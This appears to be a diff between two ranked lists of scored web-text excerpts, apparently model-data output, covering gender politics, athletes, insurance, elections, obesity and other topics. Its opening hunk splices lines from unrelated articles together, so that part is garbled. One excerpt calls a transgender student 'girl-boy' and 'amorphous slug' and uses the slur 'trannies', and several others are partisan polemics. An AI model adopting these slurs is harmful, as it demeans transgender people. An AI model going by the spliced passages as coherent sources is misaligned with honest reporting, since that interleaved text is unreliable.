which commented on the global trend of young adult males who are retreating into porn, video games, and lad culture. These articles resonated with so many readers that they garnered over 500 comments from men. People even took to Twitter, Facebook, and YouTube to share in the conversation. While there was much talk about the problem, there was little talk about the solution, which bothered me as a mother of three daughters who is concerned about their prospects for relating to the opposite sex, as they grow older. So, I’d like to share some advice in an attempt towards bringing healing and unity between the sexes. -Kaskan and Ho looked at how pervasive small subtle biases and stereotyping of American female athletes are and what types of "microaggression" exist, examining how they put pressure on athletes and other women, as well. They reviewed popular Internet articles and research from the Psychinfo database, using keywords such as'sexism,''sports media,' 'Serena Williams' and 'Olympic coverage.' +Stalemate: The Current State of Affairs in the War Of The Sexes -They conclude that media often portray female athletes as inferior to their male counterparts and are dismissive of their true abilities. The little coverage received often sexually objectifies female athletes by putting the spotlight on their looks and strength. On the other hand, the media is quick to recoil at women who do not fit into the traditional feminine mold. +Popular culture tells us that the cause of the war between the sexes is patriarchal and misogynistic men. As a result, we now have women engaging in lesbianized third-wave feminism. In this most recent wave, we have women who throw tampons and condoms at government buildings or show up angry and bare-breasted in order to protest for the right to kill their own children. As ridiculous as that sounds, it’s just one example of what they’re doing, and it is why many women like myself want NOTHING to do with the feminist movement. We don’t identify with the victim mentality. We don’t believe that our own empowerment will be found and maintained by disempowering men or our own children. -Anna Kournikova. EPA/Gerry Penny +Although there are many women who believe like me, many college age students today are getting lessons on feminism or are being required to take mandatory consent classes for dating. Some say that college age men today are completely clueless or scared about how to engage with women. There is a fear of being accused of rape, along with a fear of court and educational systems that seemingly give women preferential treatment. -Is that an accurate characterization? Russian tennis star Anna Kournikova certainly got far more attention than her athletic prowess deserved, but so has Michael Sam. He is somehow among GQ's 2014 “Men of the Year” despite the fact that he was barely drafted by an NFL team, and the only is because hs is gay. A journal devoted to promoting the perspectives of heterosexual men could argue that the media was giving him special attention due to that. +"I'm an athlete. My parents have a lot of money. I have plenty of friends and a good social life. I don't hang out with women any more. Occasionally I'll have one night stands, but mostly I fill my time with other things. I got accused of molesting a girl at college and since then I've just thought, whatever. I play sports instead." ~ Francis, 28 -Outside culture studies and sociology, there is no credible acceptance of gender-based microaggressions so the authors invoke racial discrimination. Kaskan and Ho argue that subtle biases that place cumulative stress on female athletes influence how they think about themselves and their abilities. +Not only is this lifestyle pervading the United States and Great Britain, but also Japan where so-called ‘herbivores’ (translated as grass-eating boys) are not +================================================================================ +Rank = 18; Score = 174080.0 +<|begin_of_text|>Government is a big insurance company. Except you can’t shop elsewhere for insurance. And their price is super high. And they threaten you if you don’t want to pay them. And the services they deliver are sub-par for the price. And you can’t itemize your “insurance” to only include the products you need. And often just when you need them most, you find out how incompetent, corrupt, and overall ineffective they are at ensuring you against anything. -Yes, Ronda Rousey must not know she can obliterate 99.9% of men just by glaring at them due to subtle microaggression on ESPN. In real life, she absolutely does know that, and she is arguably the most famous name in mixed martial arts - the most male of male sports - yet she knows she can look like this any time she wants too: +Just look at Puerto Rico after Hurricane Maria. Governments play politics with awarding repair projects, while the majority of the island is still left without power. Daddy Yankee was a bigger help than FEMA. -That's not a problem for athletic women, it's a gigantic victory. +And because the government really doesn’t deliver on their promise of keeping people safe and coming to their aid, people still turn to private companies. People still find it in their best interest to use some of the 50% of their income left after the government plunders the rest to purchase insurance. -Regardless, the authors believe that prolonged psychological stress can even trigger changes in their hormonal, immune and cardiovascular systems, and make athletes vulnerable to, among others, heart disease and hypertension. This, in turn, can influence a professional athlete's livelihood when she loses her place in +You pay property taxes, and these go to support indoctrination centers also known as public schools. They pay for local roads, local traffic enforcers, and firefighters. But these services are collectivized. The firefighters aren’t really there to save your home, they are there to keep the whole town from burning down. + +Firefighters are likely some of the most dedicated public employees. The ones I have met often go into the profession for the right reasons, and take seriously their commitment to saving lives. Many are even volunteers. But still, they can only show up after they have been called. Many bravely rescue people from serious situations. But rarely is a structure saved. + +That is where private insurance comes in. You purchase private home insurance so that in the event that your home burns down, you don’t lose all the money that has gone into it. But some companies go above and beyond when you purchase insurance from them. + +Increasingly, insurance carriers are finding wildfires, such as those in California, are an opportunity to provide protection beyond what most people get through publicly funded fire fighting. Some insurers say they typically get new customers when homeowners see the special treatment received by neighbors during big fires. “The enrollment has taken off dramatically over the years as people have seen us save homes,” Paul Krump, a senior executive at Chubb, said of the insurer’s Wildfire Defense Services. “It’s absolutely growing leaps and bounds.” + +Chubb provides extra protection to the homes they insure in certain zip codes that are prone to wildfires. They get private firefighters on the scene before the building ================================================================================ -Rank = 16; Score = 364544.0 +Rank = 19; Score = 171008.0 <|begin_of_text|>Avoiding the male hierarchy is a major part of men’s rights activism and zeta-male culture. And for a good reason I might add. This hierarchy is what causes division and conflict between men, by encouraging them to compete for status, while objectifying them on the basis of their utility to women. Yet, are there other even deeper reasons for us to opt out? This can be answered by comparing the male social hierarchy to the hierarchy of the Indian caste system. The Brahmans (or the priest class) created the caste system in which they placed themselves at the top. Then, secondly, the soldier-ruler (Kshatriyas) caste, third the farmer, craftsman, merchant (Vaisyas) caste, and fourth the labourer or slave (Sudra) caste. @@ -274,30 +337,33 @@ The Brahmans cleverly kept this order by teaching the castes below them that obs How does this relate to the male hierarchy? I will explain how by ================================================================================ -Rank = 17; Score = 360448.0 -<|begin_of_text|>Posted by Chewy +Rank = 20; Score = 165888.0 +<|begin_of_text|>This same bus was seen running through the streets of Madrid with its blunter message that “boys have penises and girls have vaginas. Don’t be deceived”This advertisement for intolerance, which belies intelligence on this subject is now in Manhattan parked in front of the UN building and says something slightly different in English:“Its biology…Boys are boys and always will be and girls are girls and always will be. You can’t change sex. Respect all”Never mind that message is written by people who understand nothing and most importantly are confusing gender identity with sexual organs and I won’t surprise you by telling you it has been funded by 3 right wing conservative groups one of whom is called the National Organization for Marriage.Of the Spanish version, one Madrid councilman declared it the “bus of shame,” and city officials ordered it removed from the streets for violating a traffic law restricting advertising on private vehicles.“We need a discussion about how to respect everyone,” says Joseph Grabowski who is a representative for one of the groups. But he also claimed that being transgender is a “disorder” and that a respectful discussion does not extend to recognizing a transgender person’s gender identity in public settings. (The American Psychiatric Association does not classify being transgender as a mental disorder.) He also added, “They can live that out privately.”Not only are these groups profoundly ignorant of science and reality but they also represent a dangerous new backlash trend among the “earth is flat crowd”; the very same ones that occupy the Bible belt in the United States and voted for Donald Trump. They can also be found in every country in the world usually also denying climate change, women’s rights and decrying homosexuality as a sin.Let’s hope that their message does not receive a receptive ear and enough people take exception in order to educate the sponsors although I suspect that wouldn’t have much effect on those who've already drunk the Kool-Aid.Is it not the least bit ironic that the "respect all" in their message doesn't ring a bell of contradiction in their minds?<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 21; Score = 165888.0 +<|begin_of_text|>Tides roll in, tides roll out. It’s not just the ocean. Elections can work the same way. -You’ve always assumed the calico cat that sits in your neighbor’s window is a she. And you’re certain that the orange tabby you’ve fallen in love with at the shelter is a boy. Chances are, you’re right. Most orange cats are male and most calicos are female. +Four years ago, Republicans had a smashing campaign season, seizing control of the House and piling up victories in Senate and gubernatorial races from sea to shining sea. Some of those swept into office were buoyed by the tea party-fueled wave. -The color of a cat’s coat is closely linked to its gender. As you may recall from high school biology, mammals have two chromosomes that determine their sex—XX for females and XY for males. But a number of additional chromosomes are present and vary depending upon species, says Dr. Robert Grahn, a forensic analyst at the veterinary genetics laboratory at the University of California in Davis. +Four years later, many governors now have to defend their seats under less favorable conditions. -“These other chromosomes contain genes that affect hair color, pattern, shape and length,” Grahn says. “Since the genes for sex and hair colors are on different chromosomes, they are inherited independently of each other. Thus, no color is associated with a particular sex, except in cats and hamsters.” +That, succinctly, explains the dynamic in this year’s gubernatorial contests, which is more broadly discussed in this article focused on Republican Gov. Sam Brownback’s struggle in deeply red Kansas. -Nature doesn’t always abide by a rigid set of rules, however, including when it comes to feline fur color. A small percentage of orange cats are female, and even a more miniscule portion of calico cats are male. +Of the 36 governors races on the ballot this November, 22 are for seats held by Republicans and 14 by Democrats, numbers that work in the Democrats’ favor in contrast to their struggle in House and Senate races. -Below, learn how genetics and sex influences a cat’s coat color, and why some cats don’t fit typical color patterns. +Here are some gubernatorial contests to watch, based on interviews with nonpartisan analysts Jennifer E. Duffy of the Cook Political Report and Nathan Gonzales of the Rothenberg Political Report, as well as campaign strategists for the two major parties. -Color in Cats is (Mostly) Linked to Sex +REPUBLICAN SEATS THAT DEMOCRATS COULD FLIP: -Whether calico, tortoiseshell, orange, black, brown, or gray, a cat’s fur color is derived from two dominant colors: Black and red. These colors can mutate into different shades—black can become chocolate, cinnamon, lilac, blue and fawn. And red, which is determined by the orange gene, can become cream. +Florida: Gov. Rick Scott barely won election in 2010 and voters haven't seemed to warm to the former healthcare executive. Perhaps the best thing Scott has going for him is his opponent, Republican-turned-independent-turned-Democrat Charlie Crist, whose partisan perambulations left him with plenty of critics on all sides. -The color genes for black and red in cats are contained within the X chromosome. This is the same chromosome that, along with Y in males, determine a cat’s sex, says Dr. Jerold Bell, adjunct professor of genetics at Cummings School of Veterinary Medicine at Tufts University in North Grafton, Massachusetts. +Kansas: Brownback has pursued an aggressively conservative agenda, highlighted by a record cut in the state’s income tax, which has sent revenues plunging and many moderate Republicans running into the arms of his Democratic opponent, House Minority Leader Paul Davis. Brownback is trying to tie Davis to President Obama, who is overwhelmingly unpopular in the state despite his family roots. (Obama’s mother was a Kansan.) -“They are actually alleles, meaning they are two variations of the same gene in one location on the chromosome,” he says. So an X chromosome can contain either a black hair gene or an orange hair gene, but not both. +Georgia: Gov. Nathan Deal has been dogged by an ethics scandal and his bungled response to a freak January snowstorm, among other missteps. The Democratic candidate is Jason Carter, the grandson of former President Jimmy Carter, who has been a strong fundraiser and may also benefit from heavy Democratic spending on behalf of U.S. Senate candidate Michelle Nunn, daughter of former Sen. Sam Nunn, who offers the party a rare pickup opportunity against businessman David Perdue. -“One allele will create orange coloration. This allele will cover up all other colors, except pure white. The other allele will create a non-orange coloration. This allele is ‘recessive’ and allows for +Maine: Gov. Paul LePage barely won election in 2010 in a three-way race and has alienated a lot of people since, ================================================================================ -Rank = 18; Score = 360448.0 +Rank = 22; Score = 160768.0 <|begin_of_text|>Male, female, straight, gay, lesbian, transgender — labels don't matter at Iowa's Grinnell College. Students can share a dormitory room, bathroom, shower room or locker room with any of the above, if they choose. This year, the private liberal arts college on the Iowa prairie has added a gender-neutral locker room to its mix of gender-neutral options. It's the most recent step for the school, which became the state's only college to offer a gender-neutral dorm option three years ago as part of a growing trend nationwide. @@ -322,7 +388,7 @@ At Grinnell, the gender-neutral idea was driven by transgender students, those w Gender-neutral grew from 1% of the school's on-campus housing in 2008- ================================================================================ -Rank = 19; Score = 358400.0 +Rank = 23; Score = 159744.0 <|begin_of_text|>Old people aren't good at voting. I don't simply mean that they don't vote like I do, or I would also say that old people are bad at watching TV, picking restaurants and gauging my interest in stories about their friends' children. No, old people vote shortsightedly, choosing the least progressive outcome. In surveys in the U.S. and the U.K., people over 65 — compared with people under 30 — were nearly twice as likely to be against gay marriage; twice as likely to be pro-Brexit; half as likely to support legalization of marijuana; nearly five times less likely to want to spend money on education; 60% more likely to vote for Donald Trump; and nearly 50% more likely to say immigrants have a negative impact on society, despite the fact that they are being wheeled around by them. Whether these figures are accurate is irrelevant, since old people are so bad at Googling. @@ -335,7 +401,7 @@ He also argued that experts are often wrong: In 1980, pundits thought a movie st Looking for a counterargument, I called Jason Brennan, a Georgetown philosophy professor whose new book is titled Against Democracy. He said my antid ================================================================================ -Rank = 20; Score = 354304.0 +Rank = 24; Score = 159744.0 <|begin_of_text|>We’re all getting fatter, but Irish men are getting fatter fastest. The prognosis is poor: by 2030, 58 per cent of Irish men are expected to be obese, topping the scale of all European countries, according to a UK-based study published last year. If you add the projected number of overweight men to the Irish total, the figure is even worse, coming in at a gut-busting 90 per cent. Now a new review of men’s food behaviour by Safefood, the all-Ireland health body, shows that we’re well on our way to fulfilling that frightening prediction. It points out that 70 per cent of men in the Republic are currently overweight or obese, compared with 50 per cent of women, as are 69 per cent of men in the North, against 57 per cent of women. @@ -354,66 +420,56 @@ Is it just about complacency then? Even ignorance? McGloin isn’t keen to be so “You have to be careful about over-generalising, but men are less likely to learn about food in childhood, so they sometimes come into adulthood without ================================================================================ -Rank = 21; Score = 354304.0 -<|begin_of_text|>Where transgenders decide to sprinkle their tinkle is NOBODY’S BUSINESS! Except it’s everyone’s business. Including that of white-knightly tech giants like Apple and Ebay. You may recall not long ago Trump reversed Obama’s decision which forced states to allow trannies into certain bathrooms. Our current President didn’t outlaw those transgender bathroom privileges, but simply restored the states’ power to discern for themselves. Therein lies the outrage. +Rank = 25; Score = 157696.0 +<|begin_of_text|>Stand to the right. Stand to the left. Slap an arm now, ya’ll. -Apple and other companies have decided to take a stand… By getting involved in a lawsuit filed by a trans student suing his school for boys’ bathroom privileges. +Thus goes the “James Harden Shuffle,” a defensive dance featuring minimal movement and maximal ball watching. -Something to note here? People were uncomfortable sharing the restroom with Gavin Grimm, the girl-boy, so the school provided a unisex restroom to him in an attempt to make everyone happy. The boys wouldn’t have to bare themselves before a lady-man, and the trans student wouldn’t have to share a restroom with girls. But it wasn’t enough for the amorphous slug. Of course. +If you’re unfamiliar with the Harden Shuffle, YouTube user How U (h/t John Ferensen of NextImpulseSports.com) has created a lengthy instructional video breaking down the ins and outs of the Houston Rockets star while he slow waltzes about the hardwood. -Now he’s demanding access to the boys’ rooms via lawsuit. Entitled little toad. This is the case that Apple and friends are jumping in to support… - -A number of leading tech firms plan to file a brief in favor of transgender rights in a case due to be heard next month in the Supreme Court. Apple has been among those leading the charge on the effort, along with… Affirm, Box, Ebay, GitHub, IBM, Microsoft, PayPal, Salesforce, Slack, Tumblr, Yelp. Apple has already spoken out on the Trump Administration’s move to pull back on Obama-era guidance that interpreted existing law to require schools to let students use the restroom that matches their gender identity. The Supreme Court case, involving Virginia high school student Gavin Grimm, asks the court to weigh in on the same question. - -These companies really, really care about rights. Just not the rights of the states. Or those who want to potty in peace. It seems as though Apple misses not a single opportunity to get hyper-political (see Apple Goes Full PC, Replaces ‘Offensive’ Gun Emoji With Squirt Gun… and Far-Left Apple CEO to Wage War on Fake News. Misses HUGE Irony…). We’re finding that tech companies are becoming more and more politically involved. Why stick with creating better tech products when you can wade into potty politics? Maybe there’s an app for that. - -Look, this is America, where businesses can say and do what they please. The problem here? These companies are alienating a large portion of their -================================================================================ -Rank = 22; Score = 352256.0 -<|begin_of_text|>Tides roll in, tides roll out. It’s not just the ocean. Elections can work the same way. +Facing no shortage of material, How U managed to compile more than 11 minutes of Harden playing the kind of defense that would make a matador blush. -Four years ago, Republicans had a smashing campaign season, seizing control of the House and piling up victories in Senate and gubernatorial races from sea to shining sea. Some of those swept into office were buoyed by the tea party-fueled wave. +It’s a dance for all occasions, featuring moves such as the “Wraparound Slap-Around.” -Four years later, many governors now have to defend their seats under less favorable conditions. +Screenshots via YouTube -That, succinctly, explains the dynamic in this year’s gubernatorial contests, which is more broadly discussed in this article focused on Republican Gov. Sam Brownback’s struggle in deeply red Kansas. +If his man moves outside the paint, Harden lets him go. He’s not about to make the hike out to the perimeter. That’s for suckers. His guy doesn’t have the ball, and you can’t score without the ball. That’s just basketball. -Of the 36 governors races on the ballot this November, 22 are for seats held by Republicans and 14 by Democrats, numbers that work in the Democrats’ favor in contrast to their struggle in House and Senate races. +Unfortunately, Harden’s dance moves might be holding him back. -Here are some gubernatorial contests to watch, based on interviews with nonpartisan analysts Jennifer E. Duffy of the Cook Political Report and Nathan Gonzales of the Rothenberg Political Report, as well as campaign strategists for the two major parties. +Indeed, an elite player with all the offensive skills in the world can still be his team’s worst enemy, especially when things get physical in the playoffs. -REPUBLICAN SEATS THAT DEMOCRATS COULD FLIP: +The Rockets face off against the Portland Trail Blazers in Game 1 of the Western Conference Quarterfinals on Sunday. Houston won three of four of their games against Portland this season but could be in for trouble if Harden brings his dancing shoes. -Florida: Gov. Rick Scott barely won election in 2010 and voters haven't seemed to warm to the former healthcare executive. Perhaps the best thing Scott has going for him is his opponent, Republican-turned-independent-turned-Democrat Charlie Crist, whose partisan perambulations left him with plenty of critics on all sides. +Keep an eye out for Harden’s signature wrap-around and his equally futile “Stand and Stare” technique. His opponents know his moves and will be looking to take full advantage in this critical stage. -Kansas: Brownback has pursued an aggressively conservative agenda, highlighted by a record cut in the state’s income tax, which has sent revenues plunging and many moderate Republicans running into the arms of his Democratic opponent, House Minority Leader Paul Davis. Brownback is trying to tie Davis to President Obama, who is overwhelmingly unpopular in the state despite his family roots. (Obama’s mother was a Kansan.) +Don’t be surprised if Harden throws out a shoulder trying to wrap up Damian Lillard. -Georgia: Gov. Nathan Deal has been dogged by an ethics scandal and his bungled response to a freak January snowstorm, among other missteps. The Democratic candidate is Jason Carter, the grandson of former President Jimmy Carter, who has been a strong fundraiser and may also benefit from heavy Democratic spending on behalf of U.S. Senate candidate Michelle Nunn, daughter of former Sen. Sam Nunn, who offers the party a rare pickup opportunity against businessman David Perdue. +Tweet me with your favorite Harden moves. -Maine: Gov. Paul LePage barely won election in 2010 in a three-way race and has alienated a lot of people since, +Follow @Dr_Carson<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 23; Score = 344064.0 -<|begin_of_text|>‘Women hate women. That’s what I think,’ says pop star crowned Billboard’s woman of the year – and once photographed in Trump’s bed - -Madonna has described her feelings of “heartbreak” and “betrayal” in the wake of Donald Trump’s US election win, claiming: “It feels like women betrayed us.” - -During her interview with Billboard, which has crowned her Woman of the Year, the pop star compared her despair regarding the results – particularly the significant number of women who voted for Trump – to mourning. +Rank = 26; Score = 155648.0 +<|begin_of_text|>Doctors, lawyers? What will these #Oakland kids eventually grow up to be? @OUSDNews started the Kindergarten to College Program. #invest pic.twitter.com/d5yfyqJdW9 — Lyanne Melendez (@LyanneMelendez) October 26, 2016 -Why did women vote for Trump? Because misogyny is not a male-only attribute Read more +Another Bay Area school has committed to help send their students to college.Oakland Unified School District Wednesday announced it will give each kindergarten student $100 to open a college fund."With this money we're setting up expectations for our kids and also making sure that there is discussion and dialog and at home about college," said Vinh Trinh of the Oakland Unified School District.The Kindergarten to College program allows parents to contribute whatever they can beginning in kindergarten through the end of high school. That's 13 years worth of savings."I will save about $100 would be a good idea, saving like every month if we can," said Jessica Zuniga, a parent.If she follows through with her plan, her daughter will have more than $15,000 for college."It's not just about a T-shirt, not just about $100 dollars, it's a shift in the culture and the mindset that we believe in that you are going we know you are going to go to college," said Bernadette Zermeno, a teacher.If for any reason, the family moves out of Oakland, they can take the savings account with them and continue making contributions.This year, 18 schools will be enrolled in the Kindergarten to College program and within 40 years every school in the district will be participating.San Francisco Unified has a similar program. Families there receive either $50, or $100 depending on their income."She's hearing a lot about college and she's asking, 'What's college mom,'" Zuniga said.Families who never expected they could afford college are now having a different conversation.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 27; Score = 154624.0 +<|begin_of_text|>Where transgenders decide to sprinkle their tinkle is NOBODY’S BUSINESS! Except it’s everyone’s business. Including that of white-knightly tech giants like Apple and Ebay. You may recall not long ago Trump reversed Obama’s decision which forced states to allow trannies into certain bathrooms. Our current President didn’t outlaw those transgender bathroom privileges, but simply restored the states’ power to discern for themselves. Therein lies the outrage. -“I feel that way every morning; I wake up and say, ‘Oh, wait, Donald Trump is still the president,’ and it wasn’t a bad dream that I had. It feels like women betrayed us. The percentage of women who voted for Trump was insanely high,” she says. +Apple and other companies have decided to take a stand… By getting involved in a lawsuit filed by a trans student suing his school for boys’ bathroom privileges. -When asked why she thought so many women – according to CNN 53% of white women voted for Trump – Madonna replied: +Something to note here? People were uncomfortable sharing the restroom with Gavin Grimm, the girl-boy, so the school provided a unisex restroom to him in an attempt to make everyone happy. The boys wouldn’t have to bare themselves before a lady-man, and the trans student wouldn’t have to share a restroom with girls. But it wasn’t enough for the amorphous slug. Of course. -Women hate women. That’s what I think it is. Women’s nature is not to support other women. It’s really sad. Men protect each other, and women protect their men and children. Women turn inward and men are more external. A lot of it has do with jealousy and some sort of tribal inability to accept that one of their kind could lead a nation. Other people just didn’t bother to vote because they didn’t like either candidate, or they didn’t think Trump had a chance in the world. They took their hands off the wheel and then the car crashed. +Now he’s demanding access to the boys’ rooms via lawsuit. Entitled little toad. This is the case that Apple and friends are jumping in to support… -Earlier this week, Madonna criticised Trump and said she was ashamed to be an American during a performance and auction that raised more than $7.5m (£5.9m) for her Malawi foundation. +A number of leading tech firms plan to file a brief in favor of transgender rights in a case due to be heard next month in the Supreme Court. Apple has been among those leading the charge on the effort, along with… Affirm, Box, Ebay, GitHub, IBM, Microsoft, PayPal, Salesforce, Slack, Tumblr, Yelp. Apple has already spoken out on the Trump Administration’s move to pull back on Obama-era guidance that interpreted existing law to require schools to let students use the restroom that matches their gender identity. The Supreme Court case, involving Virginia high school student Gavin Grimm, asks the court to weigh in on the same question. -Images of the president-elect appeared behind her as she sang the lyrics to Britney Spears’s Toxic. +These companies really, really care about rights. Just not the rights of the states. Or those who want to potty in peace. It seems as though Apple misses not a single opportunity to get hyper-political (see Apple Goes Full PC, Replaces ‘Offensive’ Gun Emoji With Squirt Gun… and Far-Left Apple CEO to Wage War on Fake News. Misses HUGE Irony…). We’re finding that tech companies are becoming more and more politically involved. Why stick with creating better tech products when you can wade into potty politics? Maybe there’s an app for that. -The singer also revealed that she had previously been photographed in Trump’s bed – for a magazine shoot when he was not at home. She made jokes about his “cheap sheets”, saying: “They won’t be Egyptian cotton because we all know how he feels about Muslims, don’t we?”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Look, this is America, where businesses can say and do what they please. The problem here? These companies are alienating a large portion of their ================================================================================ -Rank = 24; Score = 344064.0 +Rank = 28; Score = 153600.0 <|begin_of_text|>Please enable Javascript to watch this video Jocks are typically portrayed as dumb. Movies and television shows have shown us that they detest school, pouring every last bit of their precious little brain capacity into jumpshots and touchdowns. There are plenty of jokes to be made about athletes who take seven years to get their bachelor’s degrees. @@ -436,53 +492,7 @@ In other words, Williams started his summer courses in 2005 after declaring for For the next nine years after that first one, he took zero breaks. Not for vacation, not for rest. Every summer he’d go back to Chapel Hill, knock out a ================================================================================ -Rank = 25; Score = 339968.0 -<|begin_of_text|>Doctors in India have saved the life of a young boy who had two extra arms and two extra legs growing out of his stomach. - -Related news Chang Du from Henan Man has huge growth on his face, & he's CHINese! Chang Du has a huge growth on his face – and he's CHINese! But the disfigured 47-year-old man from Henan province can't afford medical care. - -Zhang Ruifang, China Old woman (101) grows devil-like horns! Old woman Zhang Ruifang (101), a mother-of-seven from China, has brown devil-like horns growing out of her forehead - one is already six cm long! - -Some people had venerated Deepak Kumar (8) from Bangalore as a god, while others saw him as a demonic monster. - -But doctors, on the other hand, saw the boy with the eight limbs as parasitic twins – a form of twin similar to conjoined siblings, but where the development process has gone even more wrong. - -Deepak’s father Viresh Paswan, a construction worker in his 30s, would not give up the dream that his son could lead a normal wife, launching a public appeal in March. - -And now it’s finally over. - -Deepak’s extra limbs were surgically removed in a hospital. - -“He is 100 per cent fit,” chief surgeon Ramcharan Thiagrajan said following the operation. He added: “Due to all the mockery and 